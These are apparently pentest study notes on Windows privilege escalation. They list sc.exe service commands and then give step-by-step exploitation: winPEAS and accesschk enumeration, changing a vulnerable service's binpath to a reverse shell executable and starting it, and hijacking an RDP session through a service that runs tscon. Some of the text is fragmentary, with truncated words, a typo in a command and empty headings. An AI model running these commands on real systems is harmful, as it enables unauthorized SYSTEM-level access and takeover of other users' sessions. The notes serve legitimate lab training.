Service Commands
Query the Configurations of a Service
sc.exe qc <name>Query the current status of a service:
sc.exe query <name>Modify a configuration option of a service:
sc.exe config <name> <option>= <value>Start/Stop a service:
net start/stop <name>Service Misconfigurations
-
Insecure Service Properties
-
Unquoted Service Path
-
Weak Registry Permissions
-
Insecure Service Executables
-
DLL Hijacking
Insecure Service Permissions
Each service has an ACL which defines certain service-specific permissions.
Some are dangerous (e.g. SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS)
If our user has permission to change the configuration of a service which runs with SYSTEM privileges, we can change the executable the service uses to one of our own.
Potential Rabbit Hole: If you can change a service configuration but cannot stop/start the service, you may not be able to escalate privileges!
Exploitation
Run winPEAS to check for service misconfigurations:
> .\winPEASany.exe quiet servicesinfo
We can confirm this with accesschk.exe:
.\accesschk.exe /accepteula -uwcqv user daclsvcCheck the current configuration of the service:
sc qc daclsvcCheck the current status of the service:
sc query daclsvcReconfigure the service to use our reverse shell execut
sc config daclsvc binpath="\"C:\PrivEsc\reverse.exe\""
Start a listener on Kali, and then start the service to trigger the exploit:
net start daclsvcUnquoted service Permission
RDP session Hijacking
sc create sesshijack binpath= "cmd.exe /k tscon 3 /dest:rdp-tcp#2"net start sesshijacc